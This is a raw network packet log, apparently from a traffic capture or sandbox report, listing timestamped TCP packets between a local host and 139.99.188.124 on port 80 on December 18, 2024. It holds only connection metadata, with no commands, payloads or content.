                                                                    Dec 18, 2024 09:19:19.958595037 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.958939075 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.959072113 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.961163998 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.961333990 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.961379051 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.963265896 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.963332891 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.963511944 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.964373112 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.964512110 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.964551926 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.966577053 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.966682911 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.966844082 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:19.968694925 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.968812943 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:19.968954086 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.198823929 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.198853970 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.200068951 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.200122118 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.200154066 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.201348066 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.201401949 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.201491117 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.202651024 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.202722073 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.202759027 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.203903913 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.204092026 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.315493107 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.315515041 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.315612078 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.316019058 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.316183090 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.316236973 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.317095995 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.317234993 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.317364931 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.318149090 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.318245888 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.318344116 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.319190025 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.319328070 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.319367886 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.320251942 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.320416927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.320468903 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.321250916 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.321389914 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.321460962 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.322305918 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.322391033 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.322433949 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.323299885 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.323411942 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.323493958 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.324299097 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.324418068 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.324568033 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.339435101 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.339581966 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.339651108 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.339896917 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.340101957 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.340147018 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.340838909 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.340889931 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.340934992 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.341830969 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.341922998 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.342000008 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.342804909 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.342885017 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.342925072 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.343774080 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.343863010 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.343911886 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.344779015 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.344887972 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.344999075 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.345752954 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.345803022 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.345838070 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.346738100 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.346857071 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.346903086 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.347723961 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.347878933 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.347927094 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.348695993 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.348754883 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.348970890 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.349695921 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.349828959 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.349890947 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.350738049 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.350888014 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.350924969 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.351666927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.351788044 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.351839066 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.352649927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.352807045 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.352850914 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.353741884 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.353912115 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.353950977 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.354990005 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.355045080 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.355148077 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.355767012 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.355823040 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.356064081 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.356985092 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.357089043 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.357134104 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.358019114 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.358119965 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.358155966 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.359388113 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.359441042 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.359478951 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.360052109 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.360141039 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.360209942 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.360625982 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.360759974 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.360796928 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.361515045 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.361594915 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.361628056 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.362497091 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.362600088 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.362636089 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.363467932 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.363580942 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.363624096 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.364464998 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.364581108 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.364619970 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.365470886 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.365547895 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.365586996 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.366429090 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.366518021 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.366552114 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.367432117 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.367547035 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.367584944 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.368416071 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.368479013 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.368515015 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.369384050 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.369534016 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.369599104 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.370373011 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.370472908 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.370515108 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.371361971 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.371505976 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.371553898 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.372330904 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.372442007 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.372486115 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.373359919 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.373471022 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.373512030 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.374329090 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.374442101 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.374480009 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.375294924 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.375386953 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.375500917 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.376311064 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.376365900 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.376410007 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.377302885 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.377376080 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.377414942 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.378279924 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.378390074 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.378432989 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.379307032 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.379394054 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.379429102 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.380280018 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.380371094 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.380414009 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.381177902 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.436109066 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.506781101 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.506819963 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.506894112 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.507033110 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.507153988 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.507199049 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.507978916 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.508071899 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.508117914 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.508991003 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.509115934 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.509186029 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.509972095 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.510083914 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.510124922 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.510950089 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.511051893 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.511092901 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.511928082 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.512059927 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.512100935 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.512975931 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.513025999 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.513118982 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.513942957 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.514027119 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.514898062 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.514928102 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.515043020 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.515083075 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.515863895 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.530786037 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.755892992 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.755978107 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.756762028 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.756870031 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.756911039 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.757741928 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.757904053 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.757960081 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.758908987 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.758986950 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.759027004 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.759737968 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.759823084 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.759872913 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.760713100 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.760837078 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.760881901 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.761678934 CET8049721139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:20.811101913 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:20.910039902 CET4972180192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:21.751310110 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:21.870908022 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:21.871011972 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:21.871556997 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:21.991034031 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377403021 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377449036 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377479076 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377518892 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377552032 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377558947 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.377588034 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377636909 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.377636909 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.377661943 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377716064 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377752066 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377787113 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.377791882 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.377827883 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.497618914 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.497756004 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.497931004 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.501601934 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.600240946 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.600256920 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.600539923 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.600712061 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.600725889 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.600923061 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.604757071 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.604880095 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.604926109 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.613162994 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.613229036 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.613239050 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.621552944 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.621566057 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.622437954 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.629883051 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.630009890 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.630032063 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.638308048 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.638320923 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.638513088 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.646676064 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.646759033 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.646789074 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.655036926 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.655102968 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.655133009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.663403988 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.663542986 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.663568974 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.720083952 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.720135927 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.720231056 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.795737028 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.806293011 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.806359053 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.806482077 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.809179068 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.809271097 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.809324026 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.815140009 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.815186024 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.815331936 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.820827961 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.820899010 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.821861029 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.826836109 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.827069998 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.827550888 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.832420111 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.832442045 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.832688093 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.838383913 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.838476896 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.838679075 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.844026089 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.844192028 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.844326019 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.849884033 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.849963903 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.850289106 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.855704069 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.855825901 CET8049738139.99.188.124192.168.2.6
                                                                    Dec 18, 2024 09:19:23.856081963 CET4973880192.168.2.6139.99.188.124
                                                                    Dec 18, 2024 09:19:23.860419989 CET8049738139.99.188.124192.168.2.6
